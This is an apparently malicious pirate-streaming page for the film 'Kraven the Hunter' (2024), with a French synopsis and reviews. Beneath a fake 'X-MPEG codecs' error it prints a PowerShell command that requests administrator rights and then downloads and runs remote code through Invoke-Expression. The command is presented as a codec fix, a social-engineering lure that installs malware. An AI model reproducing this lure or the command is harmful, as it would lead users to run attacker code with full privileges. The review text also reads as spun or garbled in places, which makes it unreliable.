Kraven the Hunter 2024 online
Download TORRENT(MAGNET)
Rate

Loading…
Your X-MPEG codecs do not support this video format. Try updating them to the latest version.
		powershell -Command "Start-Process powershell -ArgumentList '-Command Invoke-Expression (New-Object Net.WebClient).DownloadString(''{PATH}'')' -Verb RunAs"
	

Kraven dans Kraven the Hunter

Scenario

La relation compliquée de Kraven avec son père impitoyable, Nikolai Kravinoff, le met sur la voie de la vengeance aux conséquences brutales, le motivant à devenir non seulement le plus grand chasseur du monde, mais aussi l’un des plus redoutés. Aaron Taylor-Johnson fait un voyage dans le passé et revisite certains de ses rôles au cinéma les plus populaires, ce qui le conduit à sa dernière interprétation de l’emblématique anti-héros Marvel. Il y a eu des tentatives pour amener Kraven the Hunter sur grand écran, mais toutes ont finalement échoué. Sam Raimi voulait qu’il apparaisse dans Spider-Man 4 avant que le film ne soit annulé, et la lance de Kraven est apparue dans The Amazing Spider-Man 2 (2014) en guise de teaser pour son apparition prévue dans les Sinister Six, qui a également été annulé.

Apparu dans le casting de Crazy Comic d’AniMati : La revanche de Caillou (2022)

Quant au MCU, Ryan Coogler voulait l’inclure dans le film Black Panther (2018) comme inspiration pour la bande dessinée Black Panther de Christopher Priest, mais il n’a pas pu obtenir les droits. Jon Watts voulait que Kraven soit un méchant de secours dans Spider-Man : No Return (2021) au cas où le scénario du multivers n’aurait pas lieu. Sergei Kravinoff : [quand son père essaie de l’attaquer] Ne me fais plus ça… L’univers Spider-Man de Sony ne part pas en trombe, mais en gémissements.

« Kraven le chasseur » est cliché à chaque tournant

ATJ essaie d’en tirer le meilleur parti, mais le scénario l’en empêche. L’action est un peu amusante par moments, mais elle est brouillée par beaucoup d’exposition pompeuse. Le film est amusant lorsque Johnson est en action, provoquant un chaos sanglant, mais tout le reste est brutal. Le merveilleux casting est freiné par des dialogues maladroits et ennuyeux.

Une histoire qui manque d’intrigue

Le scénario est tout simplement mauvais et Aaron Taylor Johnson, que j’ai apprécié dans le rôle, est un gâchis. Un autre exemple d’un méchant devenu héros. Le rhinocéros et le caméléon sont gâchés, comme je m’y attendais. « Kraven the Hunter » était probablement un bon film d’action de 2004 à un moment donné, mais les astuces habituelles de Sony sont là.

ADR douloureux, montage saccadé et beaucoup d’animaux CGI sans vie !

J’ose dire que c’est l’un des films de bande dessinée modernes les plus sans âme. C’est exactement le genre de film auquel on s’attend à ce stade. Le film ne comprend aucun des personnages qu’il essaie d’adapter pour le grand écran, et le film entier donne souvent l’impression d’avoir été créé par une IA. C’est mieux que « Madame Web » et « Venom : The Last Dance », ce qui ne veut pas dire grand-chose, mais si c’est la fin de l’univers sans Spider-Man de Sony, au moins je suis content que ce soit fini.

About the author : Service Fournitures

Related posts